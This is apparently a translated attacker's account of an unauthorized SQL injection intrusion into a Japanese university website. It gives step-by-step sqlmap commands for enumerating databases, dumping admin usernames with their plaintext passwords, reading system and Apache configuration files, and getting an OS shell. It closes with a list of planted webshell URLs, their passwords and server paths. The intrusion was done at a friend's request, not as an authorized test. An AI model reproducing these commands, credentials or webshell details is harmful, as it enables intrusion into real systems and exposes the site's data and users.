Penetration into Japanese Kanagawa University site

Information Detection:

Target Site: http://icfcs.xxxxx.jp
Server IP: 210.166.xxx.76 (Japan)
Environment platform: PHP/5.1.6
Server System: Apache/2.2.3 (Red Hat)
Open the home page of the website, open a link at will, and manually test whether the injection vulnerability exists. '(an error is returned), and The sqlmap test injection is still directly performed, the returned results confirm that the injection can be performed (manual injection is not available, I wonder if it is a personal technical problem), and 1 = 1 (return normal) and 1 = 2 (return normal ), later, the two returned results of the test were both normal, and the specific cause was not clear. I did not go to the code and could not understand 0_0!

Next, use the sqlmap tool to run the Administrator account and password:


 

1. root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql" -- dbs // list all database names 2. root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql" -- current-db // list the current database name 3. root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql" -- current-user // list current database users 4. root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql"-D "icfcs" -- tables // list the table names of the icfcs database. 5. root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql"-D "icfcs"-T "admin" -- columns // list the column names in the admin table of icfcs database. 6. root @ bt:/pentest/database/sqlmap #. /sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -- Dbms "mysql"-D "icfcs"-T "admin" -- C "admin_id, admin_pw" -- dump // list admin_id in the admin table of the icfcs database, admin_pw field content available databasescurrent databasecurrent usericfcs [tables] icfcs Table: admin [columns] icfcs Table: admin [entries] [*] colonnade [*] eccube [*] icfcs [*] information_schema [*] mysql [*] namiki-s [*] testicfcsadmin-icfcs @ localhost + ---------- + | admin | download | news | research | science | + ---------- ++ ---------- + -------------- + | Column | Type | + ---------- + -------------- + | admin_id | varchar (255) | admin_pw | varchar (255) | group_id | varchar (255) | + ---------- + -------------- ++ ---------- + | admin_id | admin_pw | + ---------- + | admin | administrator | group1 | group1 | group2 | 9ffvPHh1 | group3 | Ip84lIxd | group4 | e19EkjJb | group5 | rOSuvx97 | group6 | mutPC84l | group7 | nAN8yv3a | group8 | kCUeq61u | + ---------- +

Background address: http://icfcs.xxxxx.jp/admin/, the above injection vulnerability has ran out of the Administrator account, password, but in the background found only 3 columns, an upload and a fckeditor Editor, are limited, I have tried all the ideas I know and cannot get Webshell through the background. @_@

After smoking a cigarette, I will take a rest. After some tests, I found that the admin-icfcs @ localhost database user has the root permission. the test method is as follows:

1, root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php? News_id = 66-D "eccube" -- tables // cross-database query 2, root @ bt:/pentest/database/sqlmap #./sqlmap. py-u http://icfcs.xxxxx.jp/news/detail.php? News_id = 66 -- file-read "/etc/passwd" // read system files

You can use the above two methods to test and determine that the admin-icfcs @ localhost database user is the root permission. Now that we know that admin-icfcs @ localhost is the root permission, we have a new idea, use admin-icfcs @ localhost to export Webshell directly.

Prerequisites for Mysql Root to export Webshell:
1. Inject point: http://icfcs.xxxxx.jp/news/detail.php? News_id = 66
2. Root Database User: admin-icfcs @ localhost (root permission)
3. Disable magic_quotes_gpc: Off
Reference: http://baike.baidu.com/view/5234458.htm
4. Absolute website path:/home/icfcs.kanxxxxx.ac.jp/public_html/

Sqlmap-file-read parameter-obtain the absolute path of a Website:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --file-read "/etc/httpd/conf/httpd.conf"

The path for storing the "/etc/httpd/conf/httpd. conf" Apache configuration file read using the-file-read parameter of the sqlmap tool is as follows:

 

/pentest/database/sqlmap/output/icfcs.kanxxxx-u.ac.jp/files/etc/httpd/conf/httpd.conf

Sqlmap-OS-shell parameters-methods for obtaining Webshell permissions for a website:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --os-shell

Here, we can say that we have already taken down the list. Let's look at a temporary upload file generated using the-OS-shell parameter of the sqlmap tool (the file name is randomly generated ):


The friend said that he had obtained what he needed, so I did not continue to raise the right.

Information sorting:

 /home/chemixxxba.com/public_html/files//home/chemixxxba.com/public_html/upload//home/chemixxxba.com/public_html/guanli2010//home/chemixxxba.com/public_html/phpinfo.phphttp://www.chemixxxba.com/files/EXCEL/index.php    ice/home/icfcs.kanxxxx-u.ac.jp/public_html/upload/http://icfcs.xxxxx.jp/upload/aa.php             admin!@#123ASDhttp://icfcs.xxxxx.jp/upload/gb2312.php      gh0sthttp://icfcs.xxxxx.jp/upload/0316Programs(1).php      admin!@#123ASD